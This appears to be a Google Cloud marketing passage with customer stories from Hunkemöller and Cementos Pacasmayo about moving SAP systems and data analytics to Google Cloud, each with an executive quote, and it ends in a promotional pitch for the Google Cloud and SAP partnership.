Hunkemöller Hunkemöller, a leading European lingerie brand with over 850 stores in 22 countries, aimed to enhance its customer experience and support its omnichannel growth strategy. The company migrated its SAP environment and IT infrastructure to Google Cloud using RISE with SAP. This move allowed Hunkemöller to leverage Google Cloud’s data and analytics capabilities, enabling more precise customer segmentation and personalized recommendations, leading to improved customer experiences and reduced returns.
“By moving our on-premise data to the cloud and leveraging Google Cloud technologies, we can provide our customers with the best possible customer experience—digitally driven and supported by data. Developments happen at lightspeed in retail, and we want to be a market leader when it comes to digital applications and use of data for a better customer experience and operation of the business. We worked intensively with experts from Google Cloud and partners to realize the blueprint for cloud migration.” – Gordon Smit, Global IT Director, Hunkemöller
Cementos Pacasmayo A leading producer of construction solutions in Northern Peru, Cementos Pacasmayo built a data ecosystem using the Cortex Framework, SAP, and Vertex AI on Google Cloud to provide stakeholders across all departments with fast, broad, and deep visibility into data.
“Before, three people had to work for eight hours to generate a business analysis. Now business users don’t have to wait for computer scientists or data analysts. They can act autonomously to immediately gain valuable insights thanks to automation and rich, centralized information.” – Franz Zárate, Technical Tribe Lead Data & Analytics, Cementos Pacasmayo
This is just the beginning
Google Cloud and SAP continue to collaborate, with new co-innovations coming online all the time, making Google Cloud a compelling choice for your SAP modernization initiative. Together, Google Cloud and SAP have made it easy to activate your SAP data with Cloud Cortex Framework and Vertex AI. Now you can enable advanced analytics and build cutting-edge AI/ML and generative AI applications, retain end-to-end business context for enterprise AI, and improve time-to-AI enterprise realization with instant access to your SAP data, all without thousands of integration and development hours.